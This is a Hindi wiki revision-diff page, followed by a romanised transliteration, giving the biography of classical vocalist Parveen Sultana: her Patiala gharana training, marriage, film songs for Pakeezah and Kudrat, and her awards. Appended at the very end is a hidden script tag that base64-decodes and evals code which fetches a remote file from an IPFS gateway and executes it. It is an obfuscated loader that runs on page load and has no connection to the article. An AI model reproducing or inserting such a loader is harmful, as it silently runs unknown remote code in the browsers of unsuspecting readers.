Difference between revisions of "परवीन सुल्ताना"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 33: Line 33:
 
}}
 
}}
  
'''बेगम परवीन सुल्ताना''' (जन्म- [[10 जुलाई]], [[1950]], [[असम]]) [[भारत]] की प्रसिद्ध शास्त्रीय गायिका हैं। वह 'पटियाला घराना' से सम्बन्धित हैं। परवीन सुल्ताना ऐसी विलक्षण प्रतिभाशाली गायिका हैं, जिन्हें वर्ष [[1976]] में '[[पद्मश्री]]' से सम्मानित किया गया था। असमिया पृष्ठभूमि से ताल्लुक रखने वाली परवीन सुल्ताना ने पटियाला घराने की गायकी में अपना अलग मुकाम बनाया है। उनके परिवार में कई पीढ़ियों से [[शास्त्रीय संगीत]] की परम्परा रही है। उनके गुरुओं में आचार्य चिन्मय लाहिरी और उस्ताद दिलशाद ख़ान प्रमुख रहे हैं। गीत को अपनी अन्तरात्मा मानने वाली परवीन सुल्ताना की जन्म-भूमि असम और कर्म-भूमि [[मुम्बई]] रही है।
+
'''बेगम परवीन सुल्ताना''' (जन्म- [[10 जुलाई]], [[1950]], [[असम]]) [[भारत]] की प्रसिद्ध शास्त्रीय गायिका हैं। वह 'पटियाला घराने' से सम्बन्धित हैं। परवीन सुल्ताना ऐसी विलक्षण प्रतिभाशाली गायिका हैं, जिन्हें वर्ष [[1976]] में '[[पद्मश्री]]' से सम्मानित किया गया था। असमिया पृष्ठभूमि से ताल्लुक रखने वाली परवीन सुल्ताना ने पटियाला घराने की गायकी में अपना अलग मुकाम बनाया है। उनके परिवार में कई पीढ़ियों से [[शास्त्रीय संगीत]] की परम्परा रही है। उनके गुरुओं में आचार्य चिन्मय लाहिरी और उस्ताद दिलशाद ख़ान प्रमुख रहे हैं। गीत को अपनी अन्तरात्मा मानने वाली परवीन सुल्ताना की जन्म-भूमि असम और कर्म-भूमि [[मुम्बई]] रही है।
 
==जन्म तथा शिक्षा==
 
==जन्म तथा शिक्षा==
परवीन सुल्ताना का जन्म 10 जुलाई, 1950 को नोगोंग ग्राम, असम में हुआ था। उनके [[पिता]] का नाम इकरामुल माजिद और [[माता]] का नाम मारूफा माजिद था। परवीन के पिता उनके प्रथम गुरु थे और वे उनकी शिक्षा के प्रति बहुत सख्त थे। परवीन सुल्ताना ने अपने दादा मोहम्मद नजीफ़ ख़ान से भी संगीत की शिक्षा पाई थी। बचपन से ही उन्हें संगीत में गहरी रूचि रही थी। उन्होंने अपना सबसे प्रथम संगीत कार्यक्रम बारह वर्ष कि आयु में दिया। उन्होंने पंडित लहरी से भी संगीत की शिक्षा अर्जित की और उसके बाद उस्ताद दिलशान ख़ान से, जो बाद में उनके शौहर बने। परवीन सुल्ताना उन चुनिन्दा शास्त्रीय गायिकाओं में से एक हैं, जिन्हें ईश्वर ने एक ऐसी अनोखी और खूबसूरत आवाज़ से नवाजा, जिसका कोई सानी नहीं था। उनकी लगन और तालीम ने उन्हें खूबसूरत आवाज़ और एक गरिमामय व्यक्तित्व का धनी बनाया था, इसीलिए उन्हें 'भारतीय शास्त्रीय संगीत की रानी' कहा जाता है।
+
परवीन सुल्ताना का जन्म 10 जुलाई, 1950 को नोगोंग ग्राम, असम में हुआ था। इनके पिता का नाम इकरामुल माजिद तथा माता का नाम मारूफ़ा माजिद था। परवीन सुल्तान ने सबसे पहले [[संगीत]] अपने दादाजी मोहम्मद नजीफ़ ख़ाँ साहब तथा पिता इकरामुल से सीखना शुरू किया। पिता और दादाजी की छत्रछाया ने उनकी प्रतिभा को विकसित कर उन्हें 12 वर्ष कि अल्पायु में ही अपनी प्रथम प्रस्तुति देने के लिये परिपक्व बना दिया था। इसके बाद परवीन सुल्ताना [[कोलकाता]] (भूतपूर्व कलकत्ता) में स्वर्गीय पंडित चिनमोय लाहिरी के पास संगीत सीखने गयीं तथा [[1973]] से वे 'पटियाला घराने' के उस्ताद दिलशाद ख़ाँ साहब की शागिर्द बन गयीं।
====रागों से सहजता====
+
====विवाह====
उस्ताद दिलशाद ख़ान की तालीम ने परवीन सुल्ताना की प्रतिभा की नीव को और भी सुदृढ़ किया। उनकी गायकी को नयी दिशा दी, जिससे उन्हें रागों और शास्त्रीय संगीत के अन्य तथ्यों में विशारद प्राप्त हुआ। जीवन में एक गुरु का स्थान क्या है, यह वे भलि-भाँति जानती थीं। अपने एक साक्षात्कार में उन्होंने कहा था कि "जितना महत्वपूर्ण एक अच्छा गुरु मिलना होता है, उतना ही महत्वपूर्ण होता है गुरु के बताए मार्ग पर चलना।" संभवतः इसी कारण वे कठिन से कठिन रागों को सहजता से गा लेती हैं। उनका एक धीमे आलाप से तीव्र तानों और बोल तानों पर जाना, उनके असीम आत्मविश्वास को झलकाता है, जिससे उस [[राग]] का अर्क, उसका भाव उभर कर आता है। चाहे [[ख़्याल]] हो, [[ठुमरी]] हो या कोई भजन, वे उसे उसके शुद्ध रूप में प्रस्तुत कर सबका मन मोह लेती हैं।<ref>{{cite web |url=http://podcast.hindyugm.com/2011/02/parveen-sultana-indian-classical-singer.html |title=बेगम परवीन सुल्ताना |accessmonthday=23 दिसम्बर|accessyear=2012|last= |first= |authorlink= |format= |publisher= |language=[[हिन्दी]]}}</ref>
+
दो वर्ष बाद ही परवीन सुल्ताना ने दिलशाद ख़ाँ से [[विवाह]] किया और परिणय सूत्र में बँध गयीं। इनकी एक पुत्री भी है। परवीन सुल्ताना उन चुनिन्दा शास्त्रीय गायिकाओं में से एक हैं, जिन्हें ईश्वर ने एक ऐसी अनोखी और खूबसूरत आवाज़ से नवाजा, जिसका कोई सानी नहीं था। उनकी लगन और तालीम ने उन्हें खूबसूरत आवाज़ और एक गरिमामय व्यक्तित्व का धनी बनाया था, इसीलिए उन्हें 'भारतीय शास्त्रीय संगीत की रानी' कहा जाता है।
 +
==रागों से सहजता==
 +
उस्ताद दिल्शाद ख़ाँ साहब की तालीम ने उनकी प्रतिभा की नींव को और भी सुदृढ़ किया, उनकी गायकी को नयी दिशा दी, जिससे उन्हें [[राग|रागों]] और [[शास्त्रीय संगीत]] के अन्य तथ्यों में विशारद प्राप्त हुआ। जीवन में एक गुरु का स्थान क्या है, यह वे भलि-भाँति जानती थीं। अपने एक साक्षात्कार में उन्होंने कहा था कि- "जितना महत्वपूर्ण एक अच्छा गुरु मिलना होता है, उतना ही महत्वपूर्ण होता है गुरु के बताए मार्ग पर चलना।" संभवतः इसी कारण वे कठिन से कठिन रागों को सहजता से गा लेती हैं। उनका एक धीमे आलाप से तीव्र तानों और बोल तानों पर जाना, उनके असीम आत्मविश्वास को झलकाता है, जिससे उस राग का अर्क, उसका भाव उभर कर आता है। चाहे [[ख़याल]] हो, [[ठुमरी]] हो या कोई भजन, वे उसे उसके शुद्ध रूप में प्रस्तुत कर सबका मन मोह लेती हैं।<ref>{{cite web |url=http://podcast.hindyugm.com/2011/02/parveen-sultana-indian-classical-singer.html |title=बेगम परवीन सुल्ताना |accessmonthday=23 दिसम्बर|accessyear=2012|last= |first= |authorlink= |format= |publisher= |language=[[हिन्दी]]}}</ref>  
 
==फ़िल्मों में गायन==
 
==फ़िल्मों में गायन==
परवीन सुल्ताना ने कुछ फ़िल्मों में भी गायन किया है, जिनमें 'गदर', 'कुदरत' और 'पाकीज़ा' आदि हैं, लेकिन 'कुदरत' फ़िल्म गीत "हमें तुमसे प्यार कितना, ये हम नहीं जानते" (संगीत निर्देशक [[आर. डी. बर्मन]]) और फ़िल्म "पाकीज़ा" का 'कौन गली गयो श्याम' सबसे अधिक पसंद किया गया था। [[शास्त्रीय संगीत]] में जहाँ [[ख़्याल]] गायन में इनको प्रवीणता हासिल रही, वहीं शास्त्रीय सुगम संगीत में [[ठुमरी]], दादरा, चैती, [[कजरी]] आदि बेहद पसंद की गईं। राग हंसध्वनी का तराना श्रोताओं की विशेष फरमाइश हुआ करता था। वहीँ [[कबीर]] के भजन भी उतनी ही खूबसूरती से प्रस्तुत किये। फ़िल्म 'परवाना' में [[1971]] में [[आशा भोंसले]] के साथ परवीन सुल्ताना ने 'पिया की गली' (संगीतकार [[मदन मोहन]]) गीत गाया था। गज़ल भी वह उतनी ही मधुरता और डूब कर गाती हैं, जितना शास्त्रीय संगीत का ख्याल। 'ये धुआं सा कह से उठता है' उनके द्वारा गाई गई गज़ल काफ़ी चर्चित रही थी।
+
परवीन सुल्ताना ने फ़िल्म 'पाकीज़ा' से फ़िल्मों में गायन की शुरुआत की थी। सोलह वर्ष की उम्र में परवीन [[मुंबई]] आई थीं और यहीं पर इत्तेफाक से मशहूर संगीतकार [[नौशाद|नौशाद साहब]] ने उन्हें फ़िल्म 'पाकिज़ा' के पार्श्वगायन के लिए थोड़ा-सा गाने की गुजारिश की। नौशाद साहब ने परवीन की गायकी को एक शो में देख लिया था, उसी से प्रभावित होकर उन्होंने परवीन को एक खूबसूरत मौका दिया। क़िल्म 'कुदरत' का गीत "हमें तुमसे प्यार कितना, ये हम नहीं जानते" (संगीत निर्देशक [[आर. डी. बर्मन]]) और फ़िल्म 'पाकीज़ा' का 'कौन गली गयो श्याम' सबसे अधिक पसंद किया गया था।
 +
====सफलता====
 +
परवीन सुल्ताना कहती हैं कि- नौशाद साहब के इस प्रस्ताव ने फिल्मों में मेरी गायकी के दरवाज़े खोल दिए। फिल्म 'पाकिजा' के पार्श्वगायन के लिए हम सबने '[[ठुमरी]]', 'मिश्र पिलु', 'खमाज', इन रागों में थोड़ा-थोड़ा गाया। फिल्म 'पाकिजा' के [[संगीत]] के सुपर हिट हो जाने के बाद [[मदन मोहन]] ने फिल्म 'परवाना' के लिए एक गीत को गानें का ऑफर दिया। नौशाद साहब की तरह मदन मोहन भी मेरे फैन थे। परवीन सुल्ताना ने नौशाद, मदन मोहन के अलावा लक्ष्मीकांत प्यारेलाल, शंकर जयकिशन तथा आर. डी. बर्मन के लिए भी गाया।<ref>{{cite web |url=http://hindi.oneindia.in/movies/bollywood/music/2007/11/parveen-sultana-music.html |title=रियेलिटी शॉ बच्चों को बिगाड़ रहे हैं, परवीन|accessmonthday=10 जुलाई|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref> [[शास्त्रीय संगीत]] में जहाँ [[ख़्याल]] गायन में इनको प्रवीणता हासिल रही, वहीं शास्त्रीय सुगम संगीत में [[ठुमरी]], दादरा, चैती, [[कजरी]] आदि बेहद पसंद की गईं। राग हंसध्वनी का तराना श्रोताओं की विशेष फरमाइश हुआ करता था। वहीँ [[कबीर]] के भजन भी उतनी ही खूबसूरती से प्रस्तुत किये। फ़िल्म 'परवाना' में [[1971]] में [[आशा भोंसले]] के साथ परवीन सुल्ताना ने 'पिया की गली' (संगीतकार [[मदन मोहन]]) गीत गाया था। गज़ल भी वह उतनी ही मधुरता और डूब कर गाती हैं, जितना शास्त्रीय संगीत का ख्याल। 'ये धुआं सा कह से उठता है' उनके द्वारा गाई गई गज़ल काफ़ी चर्चित रही थी।
 
====उपशास्त्रीय संगीत में दक्षता====
 
====उपशास्त्रीय संगीत में दक्षता====
 
परवीन सुल्ताना को उपशास्त्रीय संगीत में दक्षता प्राप्त है। '[[टप्पा]]' एक विधा है, जिसे गाना सभी के वश कि बात नहीं होती। इसकी वजह यह है कि इसमें आवाज़ और स्वरों को घुमाते हुए एक विशेष तरीके से बहुत संतुलित क्रम और सधे हुए स्वरों में गाया जाता है। इस एहतियात के साथ कि जटिल स्वर-संरचना के बाद भी स्वर बिखरें नहीं। परवीन सुल्ताना को टप्पे में भी महारथ हासिल थी। उनकी तानें झरने की तरह बहती तो अलाप उतने ही गंभीर और गहरे होते, जैसे किसी गहरे कूप में से ऊपर को उठती ध्वनियाँ। जितनी मिठास तार सप्तक में उतनी ही बुलंदी मंद्र सप्तक के स्वरों में, ये विविधता निस्संदेह एक कठिन साधना है। कठिन से कठिन तानें वो इतनी आसानी से लेती कि श्रोता आश्चर्य चकित रह जाते थे।
 
परवीन सुल्ताना को उपशास्त्रीय संगीत में दक्षता प्राप्त है। '[[टप्पा]]' एक विधा है, जिसे गाना सभी के वश कि बात नहीं होती। इसकी वजह यह है कि इसमें आवाज़ और स्वरों को घुमाते हुए एक विशेष तरीके से बहुत संतुलित क्रम और सधे हुए स्वरों में गाया जाता है। इस एहतियात के साथ कि जटिल स्वर-संरचना के बाद भी स्वर बिखरें नहीं। परवीन सुल्ताना को टप्पे में भी महारथ हासिल थी। उनकी तानें झरने की तरह बहती तो अलाप उतने ही गंभीर और गहरे होते, जैसे किसी गहरे कूप में से ऊपर को उठती ध्वनियाँ। जितनी मिठास तार सप्तक में उतनी ही बुलंदी मंद्र सप्तक के स्वरों में, ये विविधता निस्संदेह एक कठिन साधना है। कठिन से कठिन तानें वो इतनी आसानी से लेती कि श्रोता आश्चर्य चकित रह जाते थे।

Revision as of 06:36, 10 July 2013

paravin sultana
poora nam paravin sultana
janm 10 julaee, 1950
janm bhoomi asam
pati/patni dilashad khan
karm bhoomi bharat
karm-kshetr shastriy gayan
mukhy filmean 'gadar', 'kudarat' aur 'pakiza' adi.
puraskar-upadhi 'padmashri' (1976), 'gandharv kala nidhi' (1980), 'miyaan tanasen puraskar' (1986)
prasiddhi shastriy gayika
nagarikata bharatiy
any janakari paravin sultana ne matr barah varsh ki ayu mean apana pratham sangit karyakram diya tha.
adyatan‎ 23 disambar-2012, 6:15 (IST)

begam paravin sultana (janm- 10 julaee, 1950, asam) bharat ki prasiddh shastriy gayika haian. vah 'patiyala gharane' se sambandhit haian. paravin sultana aisi vilakshan pratibhashali gayika haian, jinhean varsh 1976 mean 'padmashri' se sammanit kiya gaya tha. asamiya prishthabhoomi se talluk rakhane vali paravin sultana ne patiyala gharane ki gayaki mean apana alag mukam banaya hai. unake parivar mean kee pidhiyoan se shastriy sangit ki parampara rahi hai. unake guruoan mean achary chinmay lahiri aur ustad dilashad khan pramukh rahe haian. git ko apani antaratma manane vali paravin sultana ki janm-bhoomi asam aur karm-bhoomi mumbee rahi hai.

janm tatha shiksha

paravin sultana ka janm 10 julaee, 1950 ko nogoang gram, asam mean hua tha. inake pita ka nam ikaramul majid tatha mata ka nam maroofa majid tha. paravin sultan ne sabase pahale sangit apane dadaji mohammad najif khaan sahab tatha pita ikaramul se sikhana shuroo kiya. pita aur dadaji ki chhatrachhaya ne unaki pratibha ko vikasit kar unhean 12 varsh ki alpayu mean hi apani pratham prastuti dene ke liye paripakv bana diya tha. isake bad paravin sultana kolakata (bhootapoorv kalakatta) mean svargiy pandit chinamoy lahiri ke pas sangit sikhane gayian tatha 1973 se ve 'patiyala gharane' ke ustad dilashad khaan sahab ki shagird ban gayian.

vivah

do varsh bad hi paravin sultana ne dilashad khaan se vivah kiya aur parinay sootr mean bandh gayian. inaki ek putri bhi hai. paravin sultana un chuninda shastriy gayikaoan mean se ek haian, jinhean eeshvar ne ek aisi anokhi aur khoobasoorat avaz se navaja, jisaka koee sani nahian tha. unaki lagan aur talim ne unhean khoobasoorat avaz aur ek garimamay vyaktitv ka dhani banaya tha, isilie unhean 'bharatiy shastriy sangit ki rani' kaha jata hai.

ragoan se sahajata

ustad dilshad khaan sahab ki talim ne unaki pratibha ki nianv ko aur bhi sudridh kiya, unaki gayaki ko nayi disha di, jisase unhean ragoan aur shastriy sangit ke any tathyoan mean visharad prapt hua. jivan mean ek guru ka sthan kya hai, yah ve bhali-bhaanti janati thian. apane ek sakshatkar mean unhoanne kaha tha ki- "jitana mahatvapoorn ek achchha guru milana hota hai, utana hi mahatvapoorn hota hai guru ke batae marg par chalana." sanbhavatah isi karan ve kathin se kathin ragoan ko sahajata se ga leti haian. unaka ek dhime alap se tivr tanoan aur bol tanoan par jana, unake asim atmavishvas ko jhalakata hai, jisase us rag ka ark, usaka bhav ubhar kar ata hai. chahe khayal ho, thumari ho ya koee bhajan, ve use usake shuddh roop mean prastut kar sabaka man moh leti haian.[1]

filmoan mean gayan

paravin sultana ne film 'pakiza' se filmoan mean gayan ki shuruat ki thi. solah varsh ki umr mean paravin muanbee aee thian aur yahian par ittephak se mashahoor sangitakar naushad sahab ne unhean film 'pakiza' ke parshvagayan ke lie tho da-sa gane ki gujarish ki. naushad sahab ne paravin ki gayaki ko ek sho mean dekh liya tha, usi se prabhavit hokar unhoanne paravin ko ek khoobasoorat mauka diya. qilm 'kudarat' ka git "hamean tumase pyar kitana, ye ham nahian janate" (sangit nirdeshak ar. di. barman) aur film 'pakiza' ka 'kaun gali gayo shyam' sabase adhik pasand kiya gaya tha.

saphalata

paravin sultana kahati haian ki- naushad sahab ke is prastav ne philmoan mean meri gayaki ke daravaze khol die. philm 'pakija' ke parshvagayan ke lie ham sabane 'thumari', 'mishr pilu', 'khamaj', in ragoan mean tho da-tho da gaya. philm 'pakija' ke sangit ke supar hit ho jane ke bad madan mohan ne philm 'paravana' ke lie ek git ko ganean ka aauphar diya. naushad sahab ki tarah madan mohan bhi mere phain the. paravin sultana ne naushad, madan mohan ke alava lakshmikaant pyarelal, shankar jayakishan tatha ar. di. barman ke lie bhi gaya.[2] shastriy sangit mean jahaan khyal gayan mean inako pravinata hasil rahi, vahian shastriy sugam sangit mean thumari, dadara, chaiti, kajari adi behad pasand ki geean. rag hansadhvani ka tarana shrotaoan ki vishesh pharamaish hua karata tha. vahian kabir ke bhajan bhi utani hi khoobasoorati se prastut kiye. film 'paravana' mean 1971 mean asha bhoansale ke sath paravin sultana ne 'piya ki gali' (sangitakar madan mohan) git gaya tha. gazal bhi vah utani hi madhurata aur doob kar gati haian, jitana shastriy sangit ka khyal. 'ye dhuaan sa kah se uthata hai' unake dvara gaee gee gazal kafi charchit rahi thi.

upashastriy sangit mean dakshata

paravin sultana ko upashastriy sangit mean dakshata prapt hai. 'tappa' ek vidha hai, jise gana sabhi ke vash ki bat nahian hoti. isaki vajah yah hai ki isamean avaz aur svaroan ko ghumate hue ek vishesh tarike se bahut santulit kram aur sadhe hue svaroan mean gaya jata hai. is ehatiyat ke sath ki jatil svar-sanrachana ke bad bhi svar bikharean nahian. paravin sultana ko tappe mean bhi maharath hasil thi. unaki tanean jharane ki tarah bahati to alap utane hi ganbhir aur gahare hote, jaise kisi gahare koop mean se oopar ko uthati dhvaniyaan. jitani mithas tar saptak mean utani hi bulandi mandr saptak ke svaroan mean, ye vividhata nissandeh ek kathin sadhana hai. kathin se kathin tanean vo itani asani se leti ki shrota ashchary chakit rah jate the.

puraskar v samman

  1. kliyopetra aauph myoozik - 1972
  2. padmashri - 1976
  3. gandharv kala nidhi - 1980
  4. miyaan tanasen puraskar - 1986
  5. sangit natak akadami puraskar - 1999


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. begam paravin sultana (hindi). . abhigaman tithi: 23 disambar, 2012.
  2. riyeliti sh aau bachchoan ko biga d rahe haian, paravin (hindi). . abhigaman tithi: 10 julaee, 2013.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>